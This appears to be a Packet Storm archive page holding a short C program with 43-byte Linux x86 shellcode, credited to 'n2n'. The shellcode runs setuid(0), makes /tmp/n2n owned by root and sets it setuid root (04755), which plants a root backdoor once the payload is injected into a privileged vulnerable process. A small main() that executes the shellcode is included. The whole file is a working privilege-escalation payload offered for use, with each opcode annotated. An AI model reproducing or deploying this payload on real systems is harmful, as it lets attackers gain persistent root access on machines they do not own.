43-byte linux x86 shellcode which does the following: setuid(0);chown("/tmp/n2n",0,0);chmod("/tmp/n2n", 04755);exit();
c9cfe186139032a40d3f9ddb38c191be71b284f24d4febdc1da027d250896d17/*
43-byte linux x86 shellcode which does the following:
setuid(0);chown("/tmp/n2n",0,0);chmod("/tmp/n2n", 04755);exit();
by n2n, n2n@linuxmail.org,
Eye On Security Research Group - India, http://www.eos-india.net/
*/
#include <stdio.h>
char
shellcode[]=
/* setuid(0) */
"\x31\xc0" // xor %eax,%eax
"\x31\xdb" // xor %ebx,%ebx
"\xb0\x17" // mov $0x17,%al
"\xcd\x80" // int $0x80
/* chown("/tmp/n2n",0,0) */
"\x31\xd2" // xor %edx,%edx
"\x31\xc9" // xor %ecx,%ecx
"\x52" // push %edx
"\x68\x2f\x6e\x32\x6e" // push $0x6e326e2f
"\x68\x2f\x74\x6d\x70" // push $0x706d742f
"\x89\xe3" // mov %esp,%ebx
"\xb0\x10" // mov $0x10,%al
"\xcd\x80" // int $0x80
/* chmod("/tmp/n2n", 04755) */
"\x66\xb9\xed\x09" // mov $0x9ed,%cx
"\xb0\x0f" // mov $0xf,%al
"\xcd\x80" // int $0x80
/* exit() */
"\x31\xc0" // xor %eax,%eax
"\xb0\x01" // mov $0x1,%al
"\xcd\x80" // int $0x80
;
int
main()
{
void (*funct) ();
(long) funct = &shellcode;
funct();
}
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed